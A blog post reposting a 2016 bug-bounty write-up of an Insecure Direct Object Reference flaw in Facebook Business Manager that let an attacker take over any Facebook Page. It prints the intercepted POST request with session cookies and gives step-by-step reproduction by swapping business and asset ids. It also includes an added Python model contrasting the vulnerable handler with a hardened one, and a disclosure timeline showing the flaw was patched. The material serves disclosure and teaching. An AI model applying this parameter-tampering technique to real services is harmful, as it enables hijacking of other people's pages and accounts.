Thursday, 29 September 2016

Taking Control of a Facebook Page (Facebook Page Takeover)

Hello everyone. Yesterday (18/9/2016) a hacker named Arun SureshKumar discovered a Facebook vulnerability that allowed taking control of a Facebook Business Page. He used Burp Suite to intercept the request and changed the structure of the request to take over the page. He earned 16,000 USD for this finding. To learn more, read the following write-up.
Facebook Page Takeover - Zero Day Vulnerability



I. OUTLINE

This write-up concerns an Insecure Direct Object Reference vulnerability in Facebook Business Manager, using which an attacker can take over Facebook pages in less than 10 seconds.


II. ABOUT FACEBOOK PAGE

Pages are for brands, businesses, organisations and public figures to create a presence on Facebook, whereas profiles represent individual people. Anyone with an account can create a Page or help manage one, if they’ve been given a role on the Page like admin or editor. People who like a Page and their friends can get updates in News Feed. With a Facebook Page, you can easily show customers what you’re all about.


Keep new and existing customers engaged by:

Listing details – such as opening hours and contact info
Adding big, beautiful photos and images
Posting updates to let people know the latest about your business


III. ABOUT FACEBOOK BUSINESS MANAGER

Business Manager lets businesses more securely share and control access to their ad accounts, Pages, and other assets on Facebook. Anyone in a business can see all of the Pages and ad accounts they work on in one place, without sharing login information or being connected to their coworkers on Facebook. When you sign into Business Manager, we’ll show you a quick overview of the ad accounts and Pages that you work on. If you’re the admin for your business, go to Business Settings to add new people, Pages, ad accounts and other assets to your business.

Business Manager is a new, more secure tool for managing access to Pages and ad accounts, geared towards companies who need to give different permissions to lots of people.


IV. BUSINESS MANAGER LETS YOU

Manage access to Pages and ad accounts: Clearly see who has access to your Pages and ad accounts and remove or change their permissions.
Keep your work separate: Get access to Pages and ad accounts without being friends with your coworkers on Facebook. Learn more about what your coworkers can see about you.


V. VULNERABILITY DESCRIPTION

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks.

Reference: Insecure Direct Object References


Reproduction Instructions / Proof of Concept

Here I will show you the security vulnerability which could take over any Facebook page.

Prerequisite:

1. Two Facebook Business accounts.

One as your own business; the other can be any test-account business.

Here I use my own business id: 907970555981524

And for the other, any partner id; I will choose it from my test account: 991079870975788

2. Add a partner using my own business and intercept the request.

Now you can see the vulnerable request:

POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 436
Origin: https://business.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB; sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA; c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837; fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I; csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2; presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC; act=1472469233458%2F6

parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733

3. Change the asset id to the page you want to hack, and also interchange the parent_business_id with the agency_id, i.e.:

parent_business_id=991079870975788
agency_id=907970555981524
asset_id=190313461381022
role=MANAGER

4. Resend the request.

The request is sent successfully. The page is added to the attacker's Facebook Business Manager with the permission role Manager.

5. Assign myself as the admin of the page that was added by the exploit.

6. Browse the page using Facebook Business Manager and do the desired amount of things!
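As an added example (not Facebook's code and not the author's), here is a small Python model of the authorization check that the asset_to_agency endpoint described in sections V and above was missing: the flawed handler trusts parent_business_id, agency_id and asset_id straight from the form body, while the hardened handler verifies that the logged-in user administers parent_business_id and that this business actually owns asset_id before sharing it with the agency. The business, page and user ids are the ones quoted in this write-up; the victim business and user ids are placeholders, and the ownership tables are constructed for the example.

```python
from urllib.parse import parse_qs

# Constructed authorization state (not real Facebook data). Ids are the ones
# quoted in the write-up; the victim business/user ids are placeholders.
BUSINESS_ADMINS = {
    "907970555981524": {"100000771680694"},   # attacker's own business
    "991079870975788": {"100000771680694"},   # attacker's test-account business
    "VICTIM_BUSINESS_ID": {"VICTIM_USER_ID"},  # placeholder owner of the target page
}
PAGE_OWNER = {
    "536195393199075": "907970555981524",     # page legitimately shared in step 2
    "190313461381022": "VICTIM_BUSINESS_ID",  # asset_id substituted in step 3
}

def _fields(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}

def share_asset_vulnerable(session_user, body, agency_assets):
    """Models the flawed endpoint: every object id in the body is trusted as-is."""
    f = _fields(body)
    if f.get("__user") != session_user:
        return "denied"
    agency_assets.setdefault(f["agency_id"], {})[f["asset_id"]] = f["role"]
    return "shared"

def share_asset_hardened(session_user, body, agency_assets):
    """Same operation, but the object references are authorized server-side."""
    f = _fields(body)
    parent, asset = f.get("parent_business_id"), f.get("asset_id")
    if f.get("__user") != session_user:
        return "denied"
    if session_user not in BUSINESS_ADMINS.get(parent, set()):
        return "denied"  # caller does not administer parent_business_id
    if PAGE_OWNER.get(asset) != parent:
        return "denied"  # parent business does not own asset_id
    agency_assets.setdefault(f["agency_id"], {})[asset] = f["role"]
    return "shared"

# The step 2 body (legitimate) and the step 3 body with the ids interchanged.
LEGIT_BODY = ("parent_business_id=907970555981524&agency_id=991079870975788"
              "&asset_id=536195393199075&role=MANAGER&__user=100000771680694")
SWAPPED_BODY = ("parent_business_id=991079870975788&agency_id=907970555981524"
                "&asset_id=190313461381022&role=MANAGER&__user=100000771680694")

if __name__ == "__main__":
    for handler in (share_asset_vulnerable, share_asset_hardened):
        assets = {}
        print(handler.__name__, handler("100000771680694", LEGIT_BODY, assets),
              handler("100000771680694", SWAPPED_BODY, assets))
```

The flawed handler reports "shared" for both bodies; the hardened one shares the attacker's own page and denies the swapped request, so the target page never lands in the attacker's Business Manager.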


VI. Video POC


VII. IMPACT

Take over any Facebook Page (e.g. the pages of Bill Gates, Narendra Modi, Barack Obama) and perform any desired amount of actions, including critical actions like page deletion.


VIII. TIMELINE

All timestamps are in India Standard Time. I omitted a few unimportant interactions.

- 29 August 2016 at 00:08: Initial report
- 30 August 2016 at 06:52: Bug acknowledged by security team member Nancy
- 30 August 2016 at 12:29: Security team member Neal Poole informed me that “Issue should be addressed (we’ve taken down the endpoint temporarily and are going to be removing it entirely)”.
- 6 September 2016 at 21:30: I replied confirming that the bug was patched.
- 6 September 2016 at 23:04: Security team member William informed me that “We have looked into this issue and believe that the vulnerability has been patched. Please follow up with us if you believe that the patch does not resolve this issue.”
- 6 September 2016 at 23:04: I replied that the permanent fix patched the bug.
- 16 September 2016 at 01:24: Security team member Rusty informed me that “I wanted to reach out and inform you that we have decided to pay you a bounty of 16,000 dollars for this report. A majority of the bounty is for the page takeover capability of your exploit, but while investigating your report we discovered and fixed another issue as well, so the bounty is a little higher because of that. You can expect the standard longer payout message later in the week.”
- 16 September 2016 at 02:32: Bounty of $16,000 awarded.
